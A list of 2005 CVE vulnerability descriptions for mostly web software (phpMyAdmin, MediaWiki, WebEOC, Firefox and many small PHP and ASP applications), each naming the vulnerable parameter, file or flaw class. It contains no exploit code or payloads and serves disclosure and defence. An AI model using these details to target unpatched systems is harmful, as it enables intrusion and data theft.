[CVE-2005-2956] ATutor 1.5.1, and possibly earlier versions, stores temporary chat logs under the web document root with insufficient access control and predictable filenames, which allows remote attackers to obtain user chat conversations via direct requests to those files.
[CVE-2005-2953] Cross-site scripting (XSS) vulnerability in merchant.mvc in MIVA Merchant 5 allows remote attackers to inject arbitrary web script or HTML via the Customer_Login parameter.
[CVE-2005-2950] Cross-site scripting (XSS) vulnerability in Sawmill 7.0.0 through 7.1.13 allows remote attackers to inject arbitrary web script or HTML via the query string in an HTTP GET request.
[CVE-2005-2901] Multiple cross-site scripting (XSS) vulnerabilities in CjWeb2Mail 3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) message, or (3) ip parameter to thankyou.php or (4) emsg parameter to web2mail.php.
[CVE-2005-2900] Cross-site scripting (XSS) vulnerability in top.php in CjLinkOut 1.0 allows remote attackers to inject arbitrary web script or HTML via the 123 parameter.
[CVE-2005-2899] Multiple cross-site scripting (XSS) vulnerabilities in details.php in CjTagBoard 3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) date, (2) time, (3) name, (4) ip, (5) agent, or (6) msg parameter.
[CVE-2005-2897] WEB//NEWS 1.4 allows remote attackers to obtain sensitive information via a direct request to files in the actions directory, which reveal the path in an error message, as demonstrated using cat.add.php.
[CVE-2005-2896] SQL injection vulnerability in WEB//NEWS 1.4 allows remote attackers to execute arbitrary SQL commands via the (1) wn_userpw parameter to startup.php, (2) cat, (3) id, or (4) stof parameter to news.php, or (5) id parameter to print.php.
[CVE-2005-2894] Cross-site scripting (XSS) vulnerability in the user registration in PBLang 4.65, and possibly earlier versions, allows remote attackers to inject arbitrary web script or PHP via the location field.
[CVE-2005-2891] WebArchiveX.dll 5.5.0.76 installed before September 6th, 2005 is marked safe for scripting by default, which allows remote attackers to read or write to arbitrary files via the (1) MakeArchive or (2) MakeArchiveStr methods.
[CVE-2005-2886] Multiple cross-site scripting (XSS) vulnerabilities in MAXdev MD-Pro 1.0.73, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via (1) the print parameter to the print module, the sitename parameter to (2) bb_smilies or (3) bbcode_ref module, or (4) the hlpfile parameter to openwindow.php.
[CVE-2005-2884] Cross-site scripting (XSS) vulnerability in events.php in Land Down Under (LDU) 801 and earlier allows remote attackers to inject arbitrary web script or HTML via the Description field in an event.
[CVE-2005-2882] Multiple cross-site scripting (XSS) vulnerabilities in phpCommunityCalendar 4.0.3, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via the LocationID parameter to (1) thankyou.php or (2) day.php, font parameter to (3) calDaily.php, (4) calMonthly.php, (5) calMonthlyP.php, (6) calWeekly.php, (7) calWeeklyP.php, (8) calYearly.php, (9) calYearlyP.php, (10) day.php, or (11) week.php, or (12) CeTi, (13) Contact, (14) Description, (15) ShowAddress parameter to event.php, and other attack vectors.
[CVE-2005-2879] Advansysperu Software USB Lock Auto-Protect (AP) 1.5 uses a weak encryption scheme to encrypt passwords, which allows local users to gain sensitive information and bypass USB interface protection.
[CVE-2005-2869] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin before 2.6.4 allow remote attackers to inject arbitrary web script or HTML via (1) the Username to libraries/auth/cookie.auth.lib.php or (2) the error parameter to error.php.
[CVE-2005-2863] Cross-site scripting (XSS) vulnerability in openwebmail-main.pl in OpenWebMail 2.41 allows remote attackers to inject arbitrary web script or HTML via the sessionid parameter.
[CVE-2005-2861] Cross-site scripting (XSS) vulnerability in N-Stealth Commercial Edition before 5.8.0.38 and Free Edition before 5.8.1.03 allows remote attackers to inject arbitrary web script or HTML via the Server field in an HTTP response header, which is directly injected into an HTML report.
[CVE-2005-2860] Cross-site scripting (XSS) vulnerability in Nikto 1.35 and earlier allows remote attackers to inject arbitrary web script or HTML via the Server field in an HTTP response header, which is directly injected into an HTML report.
[CVE-2005-2859] Savant Web Server stores user credentials in plaintext in the Savant\Users registry key, which allows local users to gain privileges.
[CVE-2005-2855] Cross-site scripting (XSS) vulnerability in Unclassified NewsBoard 1.5.3 allows remote attackers to inject arbitrary web script or HTML via the description field.
[CVE-2005-2853] Multiple cross-site scripting (XSS) vulnerabilities in GuppY 4.5.3a and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the pg parameter to printfaq.php, or the (2) Referer or (3) User-Agent HTTP headers, which are not properly handled by error.php.
[CVE-2005-2840] Multiple unknown vulnerabilities in MAXdev MD-Pro 1.0.72 and earlier have unknown impact and unspecified attack vectors, in one or more of the (1) Download, (2) Search, (3) Web links, (4) Blocks, (5) Messages, (6) News, (7) Comments, (8) Settings, (9) Stats or (10) subjects modules.
[CVE-2005-2839] Multiple cross-site scripting (XSS) vulnerabilities in MAXdev MD-Pro 1.0.72 allow remote attackers to inject arbitrary web script or HTML via (1) dl-search.php or (2) wl-search.php.
[CVE-2005-2837] Multiple eval injection vulnerabilities in PlainBlack Software WebGUI before 6.7.3 allow remote attackers to execute arbitrary Perl code via (1) Help.pm, (2) International.pm, or (3) WebGUI.pm.
[CVE-2005-2836] Multiple cross-site scripting (XSS) vulnerabilities in Phorum 5.0.17a and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the username parameter to register.php or (2) a signature of a logged-in user in "My Control Center," which is not properly handled by control.php.
[CVE-2005-2831] Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a web page with embedded CLSIDs that reference certain COM objects that are not intended for use within Internet Explorer, aka a variant of the "COM Object Instantiation Memory Corruption Vulnerability," a different vulnerability than CVE-2005-2127.
[CVE-2005-2820] Cross-site scripting (XSS) vulnerability in SqWebMail 5.0.4 allows remote attackers to inject arbitrary web script or HTML via an e-mail message containing Internet Explorer "Conditional Comments" such as "[if]" and "[endif]".
[CVE-2005-2818] Cross-site scripting (XSS) vulnerability in DownFile 1.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter to (1) email.php, (2) index.php, (3) del.php, or (4) add_form.php.
[CVE-2005-2816] Cross-site scripting (XSS) vulnerability in Greymatter allows remote attackers to inject arbitrary web script or HTML via a post comment, which is recorded in a log file but not properly handled when the administrator uses "View Control Panel Log" to read the log file.
[CVE-2005-2814] Cross-site scripting (XSS) vulnerability in FlatNuke 2.5.6 allows remote attackers to inject arbitrary web script or HTML via the usr parameter in a vis_reg operation to index.php.
[CVE-2005-2812] man2web allows remote attackers to execute arbitrary commands via -P arguments.
[CVE-2005-2803] Cross-site scripting (XSS) vulnerability in Hiki 0.8.1 to 0.8.2 allows remote attackers to inject arbitrary web script or HTML via a page name in a Login link, a different vulnerability than CVE-2005-2336.
[CVE-2005-2800] Memory leak in the seq_file implementation in the SCSI procfs interface (sg.c) in Linux kernel 2.6.13 and earlier allows local users to cause a denial of service (memory consumption) via certain repeated reads from the /proc/scsi/sg/devices file, which is not properly handled when the next() iterator returns NULL or an error.
[CVE-2005-2783] Cross-site scripting (XSS) vulnerability in PHP-Fusion 6.00.107 and earlier allows remote attackers to inject arbitrary web script or HTML via nested, malformed URL BBCode tags.
[CVE-2005-2780] Cross-site scripting (XSS) vulnerability in Land Down Under (LDU) allows remote attackers to inject arbitrary web script or HTML via a signature.
[CVE-2005-2776] Multiple cross-site scripting (XSS) vulnerabilities in Looking Glass 20040427 allow remote attackers to inject arbitrary web script or HTML via the (1) version[fullname], (2) version[homepage], or (3) version[no] parameter to footer.php, or the (4) version[fullname], (5) version[no], (6) version[author], (7) version[email] parameter to header.php.
[CVE-2005-2775] php_api.php in phpWebNotes 2.0.0 uses the extract function to modify key variables such as $t_path_core, which leads to a PHP file inclusion vulnerability that allows remote attackers to execute arbitrary PHP code via the t_path_core parameter.
[CVE-2005-2772] Multiple stack-based buffer overflows in University of Minnesota gopher client 3.0.9 allow remote malicious servers to execute arbitrary code via (1) a long "+VIEWS:" reply, which is not properly handled in the VIfromLine function, and (2) certain arguments when launching third party programs such as a web browser from a web link, which is not properly handled in the FIOgetargv function.
[CVE-2005-2769] Cross-site scripting (XSS) vulnerability in SqWebMail 5.0.4 and possibly other versions allows remote attackers to inject arbitrary web script or HTML via an HTML e-mail containing tags with strings that contain ">" or other special characters, which is not properly sanitized by SqWebMail.
[CVE-2005-2765] The user interface in the Windows Firewall does not properly display certain malformed entries in the Windows Registry, which makes it easier for attackers with administrator privileges to hide activities if the administrator only uses the Windows Firewall interface to monitor exceptions. NOTE: the vendor disputes this issue, saying that since administrative privileges are already required, it is not a vulnerability. CVE has not yet formally decided if such "information hiding" issues should be included.
[CVE-2005-2761] Cross-site scripting (XSS) vulnerability in phpGroupWare 0.9.16.000 allows administrators to inject arbitrary web script or HTML by modifying the main screen message.
[CVE-2005-2758] Integer signedness error in the administrative interface for Symantec AntiVirus Scan Engine 4.0 and 4.3 allows remote attackers to execute arbitrary code via crafted HTTP headers with negative values, which lead to a heap-based buffer overflow.
[CVE-2005-2752] An unspecified kernel interface in Mac OS X 10.4.2 and earlier does not properly clear memory before reusing it, which could allow attackers to obtain sensitive information, a different vulnerability than CVE-2005-1126 and CVE-2005-1406.
[CVE-2005-2747] Buffer overflow in ImageIO for Apple Mac OS X 10.4.2, as used by applications such as WebCore and Safari, allows remote attackers to execute arbitrary code via a crafted GIF file.
[CVE-2005-2737] Cross-site scripting (XSS) vulnerability in PhotoPost PHP Pro 5.1 allows remote attackers to inject arbitrary web script or HTML via EXIF data, such as the Camera Model Tag.
[CVE-2005-2736] Cross-site scripting (XSS) vulnerability in YaPig 0.95 and earlier allows remote attackers to inject arbitrary web script or HTML via EXIF data, such as the Camera Model Tag.
[CVE-2005-2735] Cross-site scripting (XSS) vulnerability in phpGraphy 0.9.9a and earlier allows remote attackers to inject arbitrary web script or HTML via EXIF data, such as the Camera Model Tag.
[CVE-2005-2734] Cross-site scripting (XSS) vulnerability in Gallery 1.5.1-RC2 and earlier allows remote attackers to inject arbitrary web script or HTML via EXIF data, such as the Camera Model Tag.
[CVE-2005-2731] Directory traversal vulnerability in Astaro Security Linux 6.0, when using Webmin, allows remote authenticated webmin users to read arbitrary files via a .. (dot dot) in the wfe_download parameter to index.fpl.
[CVE-2005-2724] Cross-site scripting (XSS) vulnerability in SqWebMail 5.0.4 allows remote attackers to inject arbitrary web script or HTML via a file attachment that is processed by the Display feature. NOTE: the severity of this issue has been disputed by the developer.
[CVE-2005-2722] Foojan PHP Weblog allows remote attackers to obtain sensitive information via (1) a direct request to /daylinks/index.php or (2) a negative value in the daylinkspage parameter to index.php, which reveal the path in an error message.
[CVE-2005-2721] Multiple cross-site scripting (XSS) vulnerabilities in (1) index.php or (2) admin.php in Foojan PHP Weblog allow remote attackers to inject arbitrary web script or HTML via the Referer field in the HTTP header.
[CVE-2005-2717] PHP remote file inclusion vulnerability in WebCalendar before 1.0.1 allows remote attackers to execute arbitrary PHP code when opening settings.php, possibly via send_reminders.php or other scripts.
[CVE-2005-2715] Format string vulnerability in the Java user interface service (bpjava-msvc) daemon for VERITAS NetBackup Data and Business Center 4.5FP and 4.5MP, and NetBackup Enterprise/Server/Client 5.0, 5.1, and 6.0, allows remote attackers to execute arbitrary code via the COMMAND_LOGON_TO_MSERVER command.
[CVE-2005-2709] The sysctl functionality (sysctl.c) in Linux kernel before 2.6.14.1 allows local users to cause a denial of service (kernel oops) and possibly execute code by opening an interface file in /proc/sys/net/ipv4/conf/, waiting until the interface is unregistered, then obtaining and modifying function pointers in memory that was used for the ctl_table.
[CVE-2005-2707] Firefox before 1.0.7 and Mozilla Suite before 1.7.12 allows remote attackers to spawn windows without user interface components such as the address and status bar, which could be used to conduct spoofing or phishing attacks.
[CVE-2005-2704] Firefox before 1.0.7 and Mozilla Suite before 1.7.12 allows remote attackers to spoof DOM objects via an XBL control that implements an internal XPCOM interface.
[CVE-2005-2698] Cross-site scripting (XSS) vulnerability in browse.php in Nephp Publisher Enterprise 3.04 allows remote attackers to inject arbitrary web script or HTML via a hex-encoded keywords parameter.
[CVE-2005-2689] Multiple cross-site scripting (XSS) vulnerabilities in PostNuke 0.760-RC4b allows remote attackers to inject arbitrary web script or HTML via (1) the moderate parameter to the Comments module or (2) htmltext parameter to html/user.php.
[CVE-2005-2688] Multiple cross-site scripting (XSS) vulnerabilities in SaveWebPortal 3.4 allow remote attackers to inject arbitrary web script or HTML via a large number of parameters to (1) footer.php, (2) header.php, (3) menu_dx.php, or (4) menu_sx.php, or Javascript code in the (5) HTTP_REFERER (referer) or (6) HTTP_USER_AGENT (user agent) fields.
[CVE-2005-2687] PHP remote file inclusion vulnerability in SaveWebPortal 3.4 allows remote attackers to execute arbitrary PHP code via the (1) SITE_Path parameter to menu_dx.php or (2) CONTENTS_Dir parameter to menu_sx.php.
[CVE-2005-2686] Directory traversal vulnerability in SaveWebPortal 3.4 allows remote attackers to include arbitrary files and execute arbitrary local PHP programs via ".." sequences in the (1) SITE_Path parameter to menu_dx.php or (2) CONTENTS_Dir parameter to menu_sx.php.
[CVE-2005-2685] SaveWebPortal 3.4 allows remote attackers to execute arbitrary PHP code via a direct request to admin/PhpMyExplorer/editerfichier.php, then editing the desired file to contain the PHP code, as demonstrated using header.php in the fichier parameter. NOTE: it is possible that this vulnerability stems from PhpMyExplorer, which is a separate package.
[CVE-2005-2680] Unspecified vulnerability in BEA WebLogic Portal 8.1 through SP4, when using entitlements, allows remote attackers to bypass access restrictions for the pages of a Book via crafted URLs.
[CVE-2005-2677] ACNews stores the database in a file under the web document root with a db.inc extension and insufficient access control, which allows remote attackers to obtain sensitive information such as the full pathname of the server.
[CVE-2005-2676] Cross-site scripting (XSS) vulnerability in displayimage.php in Coppermine Photo Gallery before 1.3.4 allows remote attackers to inject arbitrary web script or HTML via EXIF data.
[CVE-2005-2674] ** DISPUTED ** Note: the vendor has disputed this issue. Multiple cross-site scripting (XSS) vulnerabilities in Land Down Under (LDU) 800 allow remote attackers to inject arbitrary web script or HTML via the (1) c or (2) m parameters to index.php or (3) w parameter to journal.php. NOTE: this issue has been disputed by the vendor, who says "None of the tricks written there are working, the variables are properly sanitized and no LDU version is affected."
[CVE-2005-2653] Cross-site scripting (XSS) vulnerability in BBCaffe 2.0 allows remote attackers to inject arbitrary web script or HTML via e-mail data in a message.
[CVE-2005-2650] Cross-site scripting (XSS) vulnerability in sign.asp in Emefa Guestbook 1.2 allows remote attackers to inject arbitrary web script or HTML via the (1) name, (2) location, and (3) email parameters.
[CVE-2005-2649] Cross-site scripting (XSS) vulnerability in ATutor 1.5.1 allows remote attackers to inject arbitrary web script or HTML via (1) course parameter in login.php or (2) words parameter in search.php.
[CVE-2005-2647] Cross-site scripting (XSS) vulnerability in Xerox MicroServer Web Server in Document Centre 220 through 265, 332 and 340, 420 through 490, and 535 through 555 allows remote attackers to inject arbitrary web script or HTML and modify web pages via unknown vectors.
[CVE-2005-2646] Unknown vulnerability in Xerox MicroServer Web Server in Document Centre 220 through 265, 332 and 340, 420 through 490, and 535 through 555 allows remote attackers to cause a denial of service or read files via unknown vectors involving crafted HTTP requests.
[CVE-2005-2645] Unknown vulnerability in Xerox MicroServer Web Server in Document Centre 220 through 265, 332 and 340, 420 through 490, and 535 through 555 allows remote attackers to bypass authentication.
[CVE-2005-2638] Multiple cross-site scripting (XSS) vulnerabilities in PHPFreeNews 1.40 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) NewsMode parameter to NewsCategoryForm.php, or the (2) Match or (3) NewsMode parameter to SearchResults.php.
[CVE-2005-2622] Cross-site scripting (XSS) vulnerability in index.php in ECW-Shop 6.0.2 allows remote attackers to inject arbitrary web script or HTML via the (1) max or (2) ctg parameter.
[CVE-2005-2610] Cross-site scripting (XSS) vulnerability in index.php in VegaDNS 0.8.1, 0.9.8, and possibly other versions, allows remote attackers to inject arbitrary web script or HTML via the message parameter.
[CVE-2005-2604] index.php for My Image Gallery (Mig) 1.4.1 allows remote attackers to obtain the web server path via certain currDir and image arguments, which leaks the path in an error message.
[CVE-2005-2603] Cross-site scripting (XSS) vulnerability in index.php for My Image Gallery (Mig) 1.4.1 allows remote attackers to inject arbitrary web script or HTML via the (1) currDir or (2) image parameters.
[CVE-2005-2590] Cross-site scripting (XSS) vulnerability in Parlano MindAlign 5.0 and later versions allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2005-2588] Multiple cross-site scripting (XSS) vulnerabilities in DVBBS 7.1 SP2 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the page parameter to dispbbs.asp, (2) name parameter to dispuser.asp, or the (3) title, (4) view, or (5) act parameter to boardhelp.asp.
[CVE-2005-2586] Mentor ADSL-FR4II router running firmware 2.00.0111 stores the web administration password in cleartext in the backup configuration file, which allows local users to obtain sensitive information.
[CVE-2005-2583] Mentor ADSL-FR4II router running firmware 2.00.0111 has an undocumented web server running on TCP port 5678, which allows local users to gain access.
[CVE-2005-2569] Multiple cross-site scripting (XSS) vulnerabilities in FunkBoard 0.66CF, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via the fbusername or fbpassword parameter to (1) editpost.php, (2) prefs.php, (3) newtopic.php, (4) reply.php, or (5) profile.php, the (6) fbusername, (7) fmail, (8) www, (9) icq, (10) yim, (11) location, (12) sex, (13) interebbies, (14) sig or (15) aim parameter to register.php, or (16) subject parameter to newtopic.php.
[CVE-2005-2563] Multiple cross-site scripting (XSS) vulnerabilities in Gravity Board X (GBX) 1.1 allow remote attackers to inject arbitrary web script or HTML via (1) the board_id parameter to deletethread.php or (2) the template.
[CVE-2005-2560] Cross-site scripting (XSS) vulnerability in index.cfm in CFBB 1.1.0 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2005-2557] Cross-site scripting (XSS) vulnerability in view_all_set.php in Mantis 0.19.0a1 through 1.0.0a3 allows remote attackers to inject arbitrary web script or HTML via the dir parameter, as identified by bug#0005959, and a different vulnerability than CVE-2005-3090.
[CVE-2005-2554] The web server for Network Associates ePolicy Orchestrator Agent 3.5.0 (patch 3) uses insecure permissions for the "Common Framework\Db" folder, which allows local users to read arbitrary files by creating a subfolder in the EPO agent web root directory.
[CVE-2005-2545] Multiple cross-site scripting (XSS) vulnerabilities in PHPOpenChat 3.0.2 allow remote attackers to inject arbitrary web script or HTML via the (1) title or (2) content parameter to profile.php and profile_misc.php, (3) the profile fields in userpage.php, (4) subject or (5) body in mail.php, or (8) disinvited_chatter or (7) invited_chatter parameter to invite.php.
[CVE-2005-2542] Invision Power Board (IPB) 1.0.3 allows remote attackers to inject arbitrary web script or HTML via an attachment, which is automatically downloaded and processed as HTML.
[CVE-2005-2539] Multiple cross-site scripting (XSS) vulnerabilities in FlatNuke 2.5.5 and possibly earlier versions allow remote attackers to inject arbitrary web script or HTML via the (1) bodycolor, (2) backimage, (3) theme, or (4) logo parameter to structure.php, (5) admin, (6) admin_mail, or (7) back parameter to footer.php, or (8) the message body in a news post.
[CVE-2005-2524] Safari after 2.0 in Apple Mac OS X 10.3.9 allows remote attackers to bypass domain restrictions via crafted web archives that cause Safari to render them as if they came from a different site.
[CVE-2005-2523] Multiple cross-site scripting (XSS) vulnerabilities in Weblog Server in Mac OS X 10.4 to 10.4.2 allow remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2005-2522] Safari in WebKit in Mac OS X 10.4 to 10.4.2 directly accesses URLs within PDF files without the normal security checks, which allows remote attackers to execute arbitrary code via links in a PDF file.
[CVE-2005-2489] Web Content Management News System allows remote attackers to create arbitrary accounts and gain privileges via a direct request to Admin/Users/AddModifyInput.php.
[CVE-2005-2488] Cross-site scripting (XSS) vulnerability in Web Content Management News System allows remote attackers to inject arbitrary web script or HTML via (1) the strRootpath parameter to validsession.php or (2) the strTable parameter to Admin/News/List.php.
[CVE-2005-2485] Cross-site scripting (XSS) vulnerability in the Helpdesk in Logicampus before 1.1.1 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2005-2482] The StateToOptions function in msfweb in Metasploit Framework 2.4 and earlier, when running with the -D option (defanged mode), allows attackers to modify temporary environment variables before the "_Defanged" environment option is checked when processing the Exploit command.
[CVE-2005-2480] Cross-site scripting (XSS) vulnerability in ColdFusion Fusebox 4.1.0 allows remote attackers to inject arbitrary web script or HTML via the fuseaction parameter, which is not quoted in an error page, as demonstrated using index.cfm.
[CVE-2005-2476] Cross-site scripting (XSS) vulnerability in lost_passowrd.php in Naxtor Shopping Cart 1.0 allows remote attackers to inject arbitrary web script or HTML via the email parameter.
[CVE-2005-2467] Multiple cross-site scripting (XSS) vulnerabilities in MySQL Eventum 1.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to view.php, (2) release parameter to list.php, or (3) F parameter to get_jsrs_data.php.
[CVE-2005-2465] Cross-site scripting (XSS) vulnerability in pm.php in PCXP/TOPPE CMS allows remote attackers to inject arbitrary web script or HTML via the msg variable.
[CVE-2005-2460] Multiple cross-site scripting (XSS) vulnerabilities in Kayako liveResponse 2.x allow remote attackers to inject arbitrary web script or HTML via the (1) username parameter or (2) name field when entering a session or sending a message.
[CVE-2005-2455] Greasemonkey before 0.3.5 allows remote web servers to (1) read arbitrary files via a GET request to a file:// URL in the GM_xmlhttpRequest API function, (2) list installed scripts using GM_scripts, or obtain sensitive information via (3) GM_setValue and GM_getValue.
[CVE-2005-2453] Cross-site scripting (XSS) vulnerability in NetworkActiv Web Server 1.0, 2.0.0.6, 3.0.1.1, and 3.5.13, and possibly other versions, allows remote attackers to inject arbitrary web script or HTML via the query string.
[CVE-2005-2443] Kshout 2.x and 3.x stores settings.dat under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as usernames and passwords.
[CVE-2005-2442] Cross-Application Scripting (XAS) vulnerability in SPI Dynamics WebInspect 5.0.196 allows remote attackers to inject Javascript from one application into another.
[CVE-2005-2441] Multiple cross-site scripting (XSS) vulnerabilities in VBzoom allow remote attackers to inject arbitrary web script and HTML via the (1) UserName parameter to profile.php or (2) UserID parameter to login.php.
[CVE-2005-2440] SQL injection vulnerability in login.asp in Thomson Web Skill Vantage Manager allows remote attackers to execute arbitrary SQL commands via the svmPassword parameter.
[CVE-2005-2437] Website Baker Project does not properly verify the file extensions of uploaded files, which allows remote attackers to upload and execute arbitrary PHP code.
[CVE-2005-2436] browse.php in Website Baker Project allows remote attackers to obtain sensitive data via (1) a directory that does not exist in the dir parameter or (2) a direct request to certain php files, which reveal the path in an error message.
[CVE-2005-2435] Cross-site scripting (XSS) vulnerability in browse.php in Website Baker Project allows remote attackers to inject arbitrary web script or HTML via the dir parameter.
[CVE-2005-2430] Multiple cross-site scripting (XSS) vulnerabilities in GForge 4.5 allow remote attackers to inject arbitrary web script or HTML via the (1) forum_id or (2) group_id parameter to forum.php, (3) project_task_id parameter to task.php, (4) id parameter to detail.php, (5) the text field on the search page, (6) group_id parameter to qrs.php, (7) form, (8) rows, (9) cols or (10) wrap parameter to notepad.php, or the login field on the login form.
[CVE-2005-2428] Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696.
[CVE-2005-2427] Cross-site scripting (XSS) vulnerability in viewCart.asp in CartWIZ allows remote attackers to inject arbitrary web script or HTML via the message parameter.
[CVE-2005-2422] Cross-site scripting (XSS) vulnerability in index.php in Beehive Forum allows remote attackers to inject arbitrary web script or HTML via the webtag parameter.
[CVE-2005-2421] Multiple SQL injection vulnerabilities in index.php and other pages in Beehive Forum allow remote attackers to execute arbitrary SQL commands via the webtag parameter.
[CVE-2005-2416] Multiple cross-site scripting (XSS) vulnerabilities in Contrexx before 1.0.5 allow remote attackers to inject arbitrary web script or HTML via the (1) term parameter to the search module or (2) title in the blog aggregation module.
[CVE-2005-2414] Race condition in the xpcom library, as used by web browsers such as Firefox, Mozilla, Netscape, and Galeon, allows remote attackers to cause a denial of service (application crash) via a large HTML file that loads a DOM call from within nested DIV tags, which causes part of the currently rendering page and referenced objects to be deleted.
[CVE-2005-2402] Cross-site scripting (XSS) vulnerability in search.php in PHPSiteSearch 1.7.7d allows remote attackers to inject arbitrary web script or HTML via the query parameter.
[CVE-2005-2397] Cross-site scripting (XSS) vulnerability in guestbook.php in phpBook 1.46 allows remote attackers to inject arbitrary web script or HTML via the admin parameter.
[CVE-2005-2396] Cross-site scripting (XSS) vulnerability in MediaWiki 1.4.6 and earlier allows remote attackers to inject arbitrary web script or HTML via a parameter to the page move template.
[CVE-2005-2393] Cross-site scripting (XSS) vulnerability in CuteNews 1.3.6 allows remote attackers to inject arbitrary web script or HTML via (1) the lastusername parameter to index.php or (2) selected_search_arch parameter to search.php.
[CVE-2005-2392] Cross-site scripting (XSS) vulnerability in index.php for CMSimple 2.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the search parameter in the search function.
[CVE-2005-2386] Cross-site scripting (XSS) vulnerability in viewCart.asp in CartWIZ 1.20 allows remote attackers to inject arbitrary web script or HTML via the message parameter.
[CVE-2005-2380] Multiple cross-site scripting vulnerabilities in PHP Surveyor 0.98 allow remote attackers to inject arbitrary web script or HTML via the (1) sid, (2) start, and (3) id parameters to browse.php, or the sid parameter to (4) dataentry.php or (5) export.php.
[CVE-2005-2379] Multiple cross-site scripting (XSS) vulnerabilities in Oracle Reports 9.0.2 allow remote attackers to inject arbitrary web script or HTML via the (1) debug parameter to showenv, (2) test parameter to parsequery, or (3) delimiter or (4) CELLWRAPPER parameter to rwservlet.
[CVE-2005-2343] Research in Motion (RIM) BlackBerry Handheld web browser for BlackBerry Handheld before 4.0.2 allows remote attackers to cause a denial of service (hang) via a Java Application Description (JAD) file with a long application name and vendor string, which prevents a browser dialog from being properly dismissed.
[CVE-2005-2339] Cross-site scripting (XSS) vulnerability in the Unicode version of msearch (unicode-msearch) 1.51(U1)-beta1, 1.51(U1), and 1.52(U1) allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2005-2338] Multiple cross-site scripting (XSS) vulnerabilities in XOOPS 2.0.12 JP and earlier, XOOPS 2.0.13.1 and earlier, and 2.2.x up to 2.2.3 RC1 allow remote attackers to inject arbitrary web script or HTML via (1) modules that use "XOOPS Code" and (2) newbb in the forum module.
[CVE-2005-2336] Cross-site scripting (XSS) vulnerability in Hiki 0.8.0 to 0.8.2 allows remote attackers to inject arbitrary web script or HTML via "missing pages" in which the page name is not properly escaped, a different vulnerability than CVE-2005-2803.
[CVE-2005-2333] Cross-site scripting (XSS) vulnerability in smilies_popup.php in SEO-Board 1.0 allows remote attackers to inject arbitrary web script or HTML via the doc parameter.
[CVE-2005-2332] Cross-site scripting (XSS) vulnerability in PHPPageProtect 1.0.0a allows remote attackers to inject arbitrary web script or HTML via the username parameter to (1) admin.php or (2) login.php.
[CVE-2005-2327] Cross-site scripting (XSS) vulnerability in e107 0.617 and earlier allows remote attackers to inject arbitrary web script or HTML via nested [url] BBCode tags.
[CVE-2005-2326] Cross-site scripting (XSS) vulnerability in Clever Copy 2.0 and 2.0a allows remote attackers to inject arbitrary web script or HTML via the yr parameter to calendar.php.
[CVE-2005-2325] Clever Copy 2.0 and 2.0a allows remote attackers to obtain the full path of the web root via a direct request to (1) ticker.php, (2) menu.php, (3) banned.php, (4) endlayout.php, (5) randomhlinesblock.php, (6) showlast.php, (7) showlast5class1.php, (8) showlast5phorum.php, (9) showlast5phorumblock.php, (10) showlastforumbb2.php, or (11) showlastforumbb2block.php.
[CVE-2005-2324] Cross-site scripting (XSS) vulnerability in Clever Copy 2.0 and 2.0a allows remote attackers to inject arbitrary web script or HTML via the searchtype or searchterm parameters to (1) results.php or (2) categorysearch.php.
[CVE-2005-2322] Cross-site scripting (XSS) vulnerability in Class-1 Forum 0.24.4 and 0.23.2, and Clever Copy with forums installed, allows remote attackers to inject arbitrary web script or HTML via the (1) viewuser_id or (2) group parameter to users.php.
[CVE-2005-2320] WebCalendar before 1.0.0 does not properly restrict access to assistant_edit.php, which allows remote attackers to gain privileges.
[CVE-2005-2318] Cross-site scripting (XSS) vulnerability in showerr.asp in DVBBS 7.1 SP2 allows remote attackers to inject arbitrary web script or HTML via the action parameter.
[CVE-2005-2299] Multiple cross-site scripting (XSS) vulnerabilities in Simple Message Board Version 2.0 Beta 1 allow remote attackers to inject arbitrary web script or HTML via the (1) FID parameter to forum.cfm, (2) UID parameter to user.cfm, (3) TID parameter to thread.cfm, or (4) PostDate parameter to search.cfm.
[CVE-2005-2290] wps_shop.cgi in WPS Web Portal System 0.7.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) art and (2) cat variables.
[CVE-2005-2288] Cross-site scripting (XSS) vulnerability in PHPCounter 7.2 allows remote attackers to inject arbitrary web script or HTML via the EpochPrefix parameter.
[CVE-2005-2286] WebEOC before 6.0.2 does not properly check user authorization, which allows remote attackers to gain privileges via a direct request to a resource.
[CVE-2005-2285] WebEOC before 6.0.2 stores sensitive information in locations such as URIs, web pages, and configuration files, which allows remote attackers to obtain information such as Usernames, Passwords, Emergency information, medical information, and system configuration.
[CVE-2005-2284] Multiple SQL injection vulnerabilities in WebEOC before 6.0.2 allow remote attackers to modify SQL statements via unknown attack vectors.
[CVE-2005-2283] WebEOC before 6.0.2 does not properly restrict the size of an uploaded file, which allows remote authenticated users to cause a denial of service (system and database resource consumption) via a large file.
[CVE-2005-2282] Multiple cross-site scripting (XSS) vulnerabilities in WebEOC before 6.0.2 allow remote attackers to inject arbitrary web script and HTML via unknown vectors.
[CVE-2005-2281] WebEOC before 6.0.2 uses a weak encryption scheme for passwords, which makes it easier for attackers to crack passwords.
